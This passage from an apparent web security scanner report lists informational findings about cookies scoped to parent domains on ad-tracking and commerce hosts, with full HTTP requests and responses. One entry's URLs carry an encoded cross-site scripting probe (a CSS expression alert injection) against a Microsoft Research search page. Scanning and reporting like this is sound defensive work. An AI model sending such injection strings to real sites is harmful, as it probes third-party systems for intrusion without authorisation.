Set-Cookie: T_ciyg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dw7i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_fpdf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_96ti=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_c72l=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_h110=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_k9bd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ja6q=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cl47=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_axl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_f8zj=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_afn4=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6q6i=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_49e=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d73n=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e4a9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bydu=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_h5ls=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_25br=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_aoaw=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_g4lf=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_798a=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_drva=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7f3p=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5isr=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_9dth=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_dy0g=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_eylv=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_860a=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_37t9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6zdh=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_6wqt=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_bg5l=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3vjx=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d2vl=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3rgy=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8oa1=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e1hd=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_im3g=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_efdn=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_7dx8=44%3A1nxhp%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/
Set-Cookie: rth=2-lpay4l-44~1nxhp~1~1-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.17. http://am.trafficmp.com/a/bpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://am.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=41&id=23 HTTP/1.1
Host: am.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4fae74084-d4c4-4986-af20-d7ce71839597-gs1x0mwv; T_k5bs=ndp%3Ay5%3A1; rth=2-lqupie-ndp~y5~1~1-exv~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 03 Sep 2011 21:33:57 GMT
Connection: close
Set-Cookie: T_k5bs=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8t18=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3dqj=44%3A4528%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/
Set-Cookie: rth=2-lqupie-44~4528~1~1-ndp~y5~1~1-exv~0~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.18. http://api.flickr.com/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.flickr.com
Path:   /clientaccesspolicy.xml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clientaccesspolicy.xml HTTP/1.1
Host: api.flickr.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 03 Sep 2011 13:08:20 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sat, 31-Aug-2013 13:08:20 GMT; path=/; domain=.flickr.com
Cache-Control: private
X-Served-By: www169.flickr.mud.yahoo.com
Vary: Accept-Encoding
Content-Length: 2211
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Flickr API: Page not found</title>
   <link href="http://l.yimg.com/g/css/c_flickr.css.v106445.18" rel="styleshe
...[SNIP]...

10.19. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035669&c3=&c4=http%3A%2F%2Fmeetupblog.meetup.com%2F&c5=&c6=&c15=&ns__t=1315055589073&ns_c=UTF-8&c8=The%20Official%20Meetup%20HQ%20Blog&c7=http%3A%2F%2Fmeetupblog.meetup.com%2F&c9=http%3A%2F%2Fwww.meetup.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sat, 03 Sep 2011 13:12:30 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 13:12:30 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.20. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000001&d.c=gif&d.o=msnportalbetarmc&d.x=76374269&d.t=page&d.u=http%3A%2F%2Fresearch.microsoft.com%2Fapps%2Fdp%2Fsearch.aspx%3Fq%3D27b6a%2522style%25253d%2522x%2B%25253aexpression%2528alert%25281%2529%2529%2B%2522d048afd9275%26x%3D0%26y%3D0%23p%3D1%26ps%3D36%26so%3D1%26sb%3Dd%26fr%3D%26to%3D%26fd%3D%26td%3D%26rt%3D%26f%3D%26a%3D%26pn%3D27b6a%2522style%25253d%2522x%2B%25253aexpression%2528alert%25281%2529%2529%2B%2522d048afd9275%26pa&d.r=http%3A%2F%2Fresearch.microsoft.com%2Fen-us%2Fdefault.aspx HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/search.aspx?q=27b6a%22style%253d%22x+%253aexpression%28alert%281%29%29+%22d048afd9275&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 03 Sep 2011 12:56:28 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 12:56:28 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.21. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=749&token=DOTM5 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Tue, 28-Aug-2012 21:33:49 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A749%3B09%2F17%2F2011%3BDOTM5; Domain=.contextweb.com; Expires=Sun, 07-Aug-2016 21:33:49 GMT; Path=/
Content-Type: image/gif
Date: Sat, 03 Sep 2011 21:33:49 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

10.22. http://c7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=305&g=20&a=149&s=1&t=r HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: FFAbh=977B305,20|149_1#365:826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:29 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFBbh=977B305,20|149_1#0:826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:29 GMT;domain=.zedo.com;path=/;
ETag: "91967049-de5c-4a8e112997f00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=29883
Expires: Sun, 04 Sep 2011 05:58:32 GMT
Date: Sat, 03 Sep 2011 21:40:29 GMT
Connection: close

GIF89a.............!.......,...........D..;



10.23. https://cart.godaddy.com/basket.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cart.godaddy.com
Path:   /basket.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /basket.aspx?app%5Fhdr= HTTP/1.1
Host: cart.godaddy.com
Connection: keep-alive
Referer: http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; domainYardVal=%2D1; serverVersion=A

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:48:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currency1=potableSourceStr=USD311ef78c60812ba60cb9d86e; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault&sitename=cart.godaddy.com&page=/basket.aspx&server=M1PWCARTWEB009&status=200 OK&querystring=app_hdr=&piishown=0&shopper=46215871&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=19a7e39c-dcff-40f6-8f6d-e19d0c50259d&split=24&referringdomain=; domain=godaddy.com; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 405795


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">

...[SNIP]...

10.24. http://cf.addthis.com/red/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=2&gen=1000&gen=100&sid=4e6264ca66bc96d7&callback=_ate.ad.hrr&pub=xa-4c99effd765dd67e&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1lovjpa HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Sat, 03 Sep 2011 17:32:22 GMT
Set-Cookie: di=1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:22 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03-Oct-2011 17:32:22 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Sat, 03 Sep 2011 17:32:21 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"OTUxMDFOQVVTQ0EyMTczMDU4MDgwNzc0MDAwVg=="});

10.25. http://cf.addthis.com/red/usync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/usync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/usync?pid=6&puid=6422714091563403120 HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; uid=4e5e3f1ae3fd7427; uvc=22|35; psc=0; dt=X; di=%7B%7D..1315071141.10R|1315071225.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: di=%7B%226%22%3A%226422714091563403120%22%7D..1315071277.1WV|1315071141.10R|1315071141.1FE|1315071141.60|1315071141.1EY|1314983342.1OD; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:34:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Content-Type: image/png
Content-Length: 67
Date: Sat, 03 Sep 2011 17:34:55 GMT
Connection: close

.PNG
.
...IHDR.............:~.U...
IDATx.c`......H..q....IEND.B`.

10.26. http://cspix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4e5e3f1ae3fd7427&curl=http%3a%2f%2fvasco.com%2fcompany%2fpress_room%2fnews_archive%2f2011%2fnews_diginotar_reports_security_incident.aspx HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lqt1dm0zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=016020a0e0f0g0h1lqt1dmxzt137enxzt137enxzt10xzt137enxzt10; orblb=2lqupib012fd10u0100000; vstcnt=41bb010r053d7x118e10124zbs2150v10024fj9y118e10024t1es127p1012455ue118e1022; clid=2lqt1dm01170vf1kj11kp2en03m9g00b6t05100b906; sglst=41bb00v00t044m9v00arr9v00dnh9u303td9v00arp9u30f7u9u307219v000kn9v00a6p9v005m39v005m29u305no9u30dsb9v00cnw9v00esh9v00cnu9u30gol9u30esg9u30ctn9u308nc9v00ebb9v00ctp9v00cro9v004qk9u30h9v9u30dzq9u30bow9u304wb9v00dzt9v000xz0108dy9v0; rdrlst=41a0sh6lqupib000000066t051d6blqupib000000066t051byalqtqj1000000096t05120zlqupib000000066t0513kulqupib000000066t0516pilqwj0f000000026t020x18lqupib000000066t0518k8lqupib000000066t0516pelqtqj1000000096t0518ldlqwnn2000000016t0118lclqupib000000066t0518erlqtqj1000000096t05163mlqupib000000066t0518etlqwj0f000000026t0209pglqupib000000066t051679lqupib000000066t050dhvlqupib000000066t050dhxlqwj0f000000026t0218lplqupib000000066t0514kelqtqj1000000096t0518lqlqwj06000000036t0314khlqwj0f000000026t0214hnlqwj0f000000026t020lw4lqwj0f000000026t0218l0lqtqsb000000076t050lm0lqupib000000066t0517fllqupib000000066t0517gxlqtqj1000000096t0518kzlqwj02000000046t040lm4lqupib000000066t050llslqupib000000066t050zpelqwj0f000000026t020zpclqtqj1000000096t0519ezlqtqj1000000096t0518knlqw8s9000000056t0506pblqupib000000066t0518kmlqtqjn000000086t050afolqupib000000066t0507sylqupib000000066t050kkjlqupib000000066t050drhlqupib000000066t0514bxlqwj0f000000026t0214bulqtqj1000000096t051cyqlqtqj1000000096t050huxlqtqj1000000096t0516d5lqwj0f000000026t02

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lqupib012fd10u0100000; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: vstcnt=41bb010r063d7x118e10124zbs2150v10024fj9y118e10024t1es127p10124uzg6118e1032455ue118e1022; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: clid=2lqt1dm01170vf1kj11kp2en05i0c00d6u02100d908; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: sglst=41bb00v00t044m9w00arr9w00dnh9u303td9w00arp9u30f7u9u307219w000kn9w00a6p9w005m39w005m29u305no9u30dsb9w00cnw9w00esh9w00cnu9u30gol9u30esg9u30ctn9u308nc9w00ebb9w00ctp9w00cro9w004qk9u30h9v9u30dzq9u30bow9u304wb9w00dzt9w001bi030ag29w008dy9w000td9w0; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
Set-Cookie: rdrlst=41c0sh6lqupib000000086u021d6blqupib000000086u021byalqtqj10000000b6u02120zlqupib000000086u0213kulqupib000000086u0216pilqwj0f000000046u020x18lqupib000000086u0218k8lqupib000000086u0216pelqtqj10000000b6u0218ldlqwnn2000000036u0218lclqupib000000086u0218erlqtqj10000000b6u02163mlqupib000000086u0218etlqwj0f000000046u0209pglqupib000000086u021679lqupib000000086u020dhvlqupib000000086u020dhxlqwj0f000000046u0218lplqupib000000086u0214kelqtqj10000000b6u0218lqlqwj06000000056u0214khlqwj0f000000046u0214hnlqwj0f000000046u0218l0lqtqsb000000096u020lm0lqupib000000086u020lw4lqwj0f000000046u0217fllqupib000000086u0217gxlqtqj10000000b6u0218kzlqwj02000000066u020lm4lqupib000000086u020llslqupib000000086u020zpelqwj0f000000046u021192lqyjdy000000026u020zpclqtqj10000000b6u0219ezlqtqj10000000b6u0218knlqw8s9000000076u0206pblqupib000000086u0218kmlqtqjn0000000a6u020afolqupib000000086u0207sylqupib000000086u020kkjlqupib000000086u020drhlqupib